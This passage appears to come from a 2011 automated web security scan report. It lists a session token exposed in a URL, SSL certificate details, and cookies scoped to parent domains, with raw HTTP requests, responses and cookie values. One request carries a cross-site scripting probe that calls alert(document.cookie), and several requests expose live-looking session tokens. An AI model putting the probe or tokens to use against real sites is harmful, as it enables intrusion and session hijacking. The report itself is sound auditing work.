Content-Type: text/html
Content-Language: en
Content-Length: 0


8.2. http://www.securitynewsdaily.com/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.securitynewsdaily.com
Path:   /index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /index.php?option=com_ads&format=raw&w=300&ad=99&ord=454835708718746900&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=0f1dd3d09f7885410d7cea8cd0fbff710419c103 HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:16 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2331

<html>
<head>
<link rel="stylesheet" href="/templates/security_news_daily/css/security_news_daily.css" type="text/css" />
<style type='text/css'>
body{

...[SNIP]...

9. SSL certificate  previous  next
There are 3 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



9.1. https://orders.hidcorp.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://orders.hidcorp.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  orders.hidcorp.com
Issued by:  ITG Certificate Authority
Valid from:  Wed Jun 04 19:00:00 CDT 2008
Valid to:  Sun Jun 05 18:59:00 CDT 2011

9.2. https://symaccount.symantec.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://symaccount.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  symaccount.symantec.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Feb 10 18:00:00 CST 2011
Valid to:  Thu Mar 01 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

9.3. https://www-secure.symantec.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www-secure.symantec.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Fri Oct 08 19:00:00 CDT 2010
Valid to:  Mon Oct 08 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

10. Cookie scoped to parent domain  previous  next
There are 7 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://www.bericotechnologies.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bericotechnologies.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=2e1dc5d355c13a8280f8252302154c74; expires=Wed, 09-Mar-2011 22:25:02 GMT; path=/; domain=.bericotechnologies.com
Last-Modified: Mon, 14 Feb 2011 18:51:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

10.2. http://ad.media6degrees.com/adserv/cs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1894578950532504&output=html&h=90&slotname=3983344906&w=728&channel=9120656992_3996339198&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools347ac'-alert(document.cookie)-'9f9a2e36974%2F&dt=1297710127289&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297710127294&frm=1&adk=2785858344&ga_vid=2067892625.1297710127&ga_sid=1297710127&ga_hid=1065518577&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1097&bih=1010&ifk=3932329480&fu=4&ifi=1&dtd=8
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12aob2xzt12707lxzt12707l; adh="1lf17qo16053t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv2aocm02219020805219; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=43511gvlggtq20000000g19020ojdlggtq20000000g19020yujlginvd0000000d19020x1blebnns1wj3q01411000e0flggrmr0000000h19020jv3lginvd0000000d19020yielginvd0000000d19020yiflginvd0000000d19020oj6lggtq20000000g19020e08lggtq20000000g190210qflginvq0000000c19020w3clebnns1wj3q01411000e0nlgevbm0000000j19020jv6lebnns1wj3q01411000jv5lggtq20000000g19020j4ilew2e20000001w19020khalggtq20000000g19021196lfzx0l0000001919021195lg7rdq0000001019020jillebnns1wj3q01411001194lg3y5y0000001619020z14lggtq20000000g19020zgdlggtq20000000g19020faalggtq20000000g19020z13lgio080000000719021193lgiiin0000000e19021192lg5l2h0000001519020jprlginvd0000000d19020w2klggtq20000000g19020yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001y19020mmnlebnns1wj3q01411000xwhlggtq20000000g19021004lginvd0000000d19020z02lggtq20000000g19020kbzlggtq20000000g19020kkclggtq20000000g19020eh5lf17qf0000001u19020z01lgmbyu00000002190206bylemlne0000002019020df5lgcqt50000000o1902111xlggtq20000000g19020mn2lginvd0000000d19020mn1lginvd0000000d19020swvlggtq20000000g1902100plggtq20000000g19020im3lgcqt50000000o19020yzflgmc0e0000000119010yzglginxj0000000a19020b6mlf17qk0000001t19020y63lg93og0000000t19020xvslebnns1wj3q01411000o5alggtq20000000g19020yyxlginvu0000000b19020yywlginzk0000000819020x1jlebnns1wj3q01411000xwclginvd0000000d19020o4plginvd0000000d19020yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000g19020yyelginyj0000000919020fullf8gij0000001q190210f6lg1nei00000018190200c9lfk1rn0000001n19020y7blg94wv0000000r19020jsalggtq20000000g190206pklginvd0000000d19020cajlfk1rn0000001n19020p7vlebnns1xgc001b120010tylg60ji00000011190210ellg1nei07gla00h120010eklggtq20000000g19020xuklebnns22191022190211k3lginvd0000000d190210telg60j600000013190210e9lg1nei0000001819020xtblggtq20000000g190210e2lggtq20000000g19020mivlgismk0000000619020yw4lggtq20000000g190210e4lginvd0000000d190210e5lg1nei0jfph015180010rdlg1vir087mk01719020xt3lggtq20000000g19020mzklgcsh70000000m19020agalggtq20000000g19020agblggtq20000000g19020mzqlgcsgy0000000n19020loxlginvd0000000d190207gmlebnns1wj3q01411000kfalginvd0000000d19020xthlebnns1xgc001b12000xtflggtq20000000g19020za2lginvd0000000d19020za1lginvd0000000d19020ovwlginvd0000000d190207gqlggtq20000000g19020lw4lginvd0000000d19020fuqlegh2b0000002119020lw3lggtq20000000g19020mz1lebnns1wj3q01411000l24lginvd0000000d19020l25lggtq20000000g190207vglfk1rn0tn5601n19020jk7lebnns1wj3q01411000cbnlfk1rn0tn5601n19020e11lggwth0000000f1902; sglst=21m0s8dtlggrmr01w8m00h1902080520h8kmlggrmr01w8m00h1902080520havtlggrmr0056q00h1902080520h82hlebnns1ucve00z10000600200avjlggrmr01w8m00h1902080520h3kilggrmr01w8m00h1902080520halhlggrmr01w8m00h1902080520h9bslggrmr01w8m00h1902080520hab4lebnns2707l0221902080521981zlggrmr0056q00h1902080520h8gxlggrmr0056q00h1902080520h81ylginvd0000000d1902080520d8gwlginvd0000000d1902080520daoklggrmr0056q00h1902080520haollginvd0000000d1902080520db07lggwth01r1w00f1902080520f8nclginvd0000000d1902080520d7inlginvd0000000d1902080520db05lggrmr01w8m00h1902080520hal1lggrmr01w8m00h1902080520h8wylginvd0000000d1902080520dbbhlggrmr01w8m00h1902080520h8wxlggrmr0056q00h1902080520hb0clfjpei0yygv01o1902080521972slggtq205iac00g1902080520gahhlginvd0000000d1902080520d8nblggrmr0056q00h1902080520hahilggrmr0056q00h1902080520h7gdlgcqt509l7900o1902080520ob08lfjpei0yygv01b1700070020040ulggrmr01w8m00h1902080520haprlggrmr01w8m00h1902080520h5l4lgcqt509l7900o1902080520oaanlebnns1xg0o00o120007002008aelggrmr0056q00h1902080520h474lgl4zd000000031902080320361hlggrmr01w8m00h1902080520h5b0lf17qo0000001s19020805219ag2leqh191vuz501z190208052193thlggrmr01w8m00h1902080520h8c9lggrmr0056q00h1902080520h9z4lggrmr01w8m00h1902080520hacjlggrmr01w8m00h1902080520hb1alfjpei0yygv01o190208052199mmlggrmr0056q00h1902080520hb0nlggrmr01w8m00h1902080520hb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00h1902080520h4zqlgl33700000005190208052059cblggrmr0056q00h1902080520h0tllegh2b25uy3021190208052195q8lebnns1ucve00k100006002004wmlggrmr01w8m00h1902080520h8bglginvd0000000d1902080520dacelggrmr01w8m00h1902080520h45mlfdxmc0000001p19020805219bhdlginvd0000000d1902080520d; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4lhh512012aob24qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122j0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r083ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4l2ch12012aocm4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16063w0s0103r01sZshBH2Om01l7sg3t2a012fr01PosQJERns01jx8p3w0t012e301OdygJLiOt01jvcj3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2arvc0231903080621a; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: rdrlst=4350ojdlggtq20000000h190311gvlggtq20000000h19030yujlginvd0000000e19030jv3lginvd0000000e19030e0flggrmr0000000i19030x1blebnns1wj3q01411000yielginvd0000000e19030yiflginvd0000000e19030oj6lggtq20000000h19030e08lggtq20000000h190310qflginvq0000000d19030e0nlgevbm0000000k19030w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000h19030j4ilew2e20000001x19030khalggtq20000000h19031196lfzx0l0000001a19031195lg7rdq0000001119030jillebnns1wj3q01411001194lg3y5y0000001719030z14lggtq20000000h19030zgdlggtq20000000h19030faalggtq20000000h19030z13lgio080000000819031193lgiiin0000000f19031192lg5l2h0000001619030jprlginvd0000000e19030w2klggtq20000000h19030yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001z19030mmnlebnns1wj3q01411000xwhlggtq20000000h19031004lginvd0000000e19030z02lggtq20000000h19030kbzlggtq20000000h19030z01lgmbyu0000000319030eh5lf17qf0000001v19030kkclggtq20000000h190306bylemlne0000002119030df5lgcqt50000000p1903111xlggtq20000000h19030mn2lginvd0000000e19030mn1lginvd0000000e19030swvlggtq20000000h1903100plggtq20000000h19030im3lgcqt50000000p19030yzflgmc0e0000000219020yzglginxj0000000b19030b6mlf17qk0000001u19030y63lg93og0000000u19030xvslebnns1wj3q01411000o5alggtq20000000h19030yyxlginvu0000000c19030yywlginzk0000000919030x1jlebnns1wj3q01411000xwclginvd0000000e19030o4plginvd0000000e19030yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000h19030yyelginyj0000000a19030fullf8gij0000001r190310f6lg1nei00000019190300c9lfk1rn0000001o19030y7blg94wv0000000s19030jsalggtq20000000h190306pklginvd0000000e19030cajlfk1rn0000001o19030p7vlebnns1xgc001b120010tylg60ji00000012190310ellg1nei07gla00h120010eklggtq20000000h19030xuklebnns22191023190311k3lginvd0000000e190310telg60j600000014190310e9lg1nei0000001919030xtblggtq20000000h190310e2lggtq20000000h19030mivlgismk0000000719030yw4lggtq20000000h190310e4lginvd0000000e190310e5lg1nei0jfph015180010rdlg1vir087mk01819030xt3lggtq20000000h19030mzklgcsh70000000n19030agalggtq20000000h19030agblggtq20000000h19030mzqlgcsgy0000000o19030loxlginvd0000000e190307gmlebnns1wj3q01411000kfalginvd0000000e19030xthlebnns1xgc001b12000xtflggtq20000000h19030za2lginvd0000000e19030za1lginvd0000000e190307gqlggtq20000000h19030ovwlginvd0000000e19030lw4lginvd0000000e19030fuqlegh2b0000002219030lw3lggtq20000000h19030l24lginvd0000000e19030mz1lebnns1wj3q01411000l25lggtq20000000h190307vglfk1rn0tn5601o19030jk7lebnns1wj3q01411000cbnlfk1rn0tn5601o19030e11lggwth0000000g1903; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Set-Cookie: sglst=21m0s8dtlggrmr01w8m00i1903080620i8kmlggrmr01w8m00i1903080620iavtlggrmr0056q00i1903080620i82hlebnns1ucve00z10000600200avjlggrmr01w8m00i1903080620i3kilggrmr01w8m00i1903080620ialhlggrmr01w8m00i1903080620i9bslggrmr01w8m00i1903080620iab4lebnns2707l0231903080621a81zlggrmr0056q00i1903080620i8gxlggrmr0056q00i1903080620i81ylginvd0000000e1903080620e8gwlginvd0000000e1903080620eaoklggrmr0056q00i1903080620iaollginvd0000000e1903080620eb07lggwth01r1w00g1903080620g7inlginvd0000000e1903080620e8nclginvd0000000e1903080620eb05lggrmr01w8m00i1903080620ial1lggrmr01w8m00i1903080620ibbhlggrmr01w8m00i1903080620i8wylginvd0000000e1903080620eb0clfjpei0yygv01p1903080621a8wxlggrmr0056q00i1903080620i72slggtq205lt200h1903080620hahhlginvd0000000e1903080620e8nblggrmr0056q00i1903080620iahilggrmr0056q00i1903080620i7gdlgcqt509opz00p1903080620pb08lfjpei0yygv01b1700070020040ulggrmr01w8m00i1903080620iaprlggrmr01w8m00i1903080620i5l4lgcqt509opz00p1903080620paanlebnns1xg0o00o120007002008aelggrmr0056q00i1903080620i474lgl4zd000000041903080420461hlggrmr01w8m00i1903080620i5b0lf17qo0000001t1903080621aag2leqh191vyhv0201903080621a3thlggrmr01w8m00i1903080620i8c9lggrmr0056q00i1903080620i9z4lggrmr01w8m00i1903080620iacjlggrmr01w8m00i1903080620ib1alfjpei0yygv01p1903080621a9mmlggrmr0056q00i1903080620ib0nlggrmr01w8m00i1903080620ib0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00i1903080620i4zqlgl33701cfx006190308062060tllegh2b25ygt0221903080621a9cblggrmr0056q00i1903080620i8bglginvd0000000e1903080620e4wmlggrmr01w8m00i1903080620i5q8lebnns1ucve00k10000600200acelggrmr01w8m00i1903080620i45mlfdxmc0000001q1903080621abhdlginvd0000000e1903080620e; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 19:01:52 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 19:01:52 GMT
Content-Length: 1037

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8;sz=728x90;click0=http://ad.media6degrees.com/adserv/clk?tId=12497909247337382|cId=3211|cb=1297710111|notifyPort=8080|exId=20|tId=1249
...[SNIP]...

10.3. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035753&rn=186743655&c7=http%3A%2F%2Fwww.securitynewsdaily.com%2F&c3=6035753&c4=http%3A%2F%2Fwww.securitynewsdaily.com%2F&c5=Technology%20-%20News&c8=Daily%20Security%20News%20Protecting%20Home%2C%20Internet%20%26%&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 14 Feb 2011 18:57:16 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 13-Feb-2013 18:57:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2100686&PluID=0&w=300&h=250&ord=5918453&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/o%3B234618958%3B0-0%3B0%3B53309666%3B4307-300/250%3B40072924/40090711/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/index.php?option=com_ads&format=raw&w=300&ad=99&ord=454835708718746900&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=0f1dd3d09f7885410d7cea8cd0fbff710419c103
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
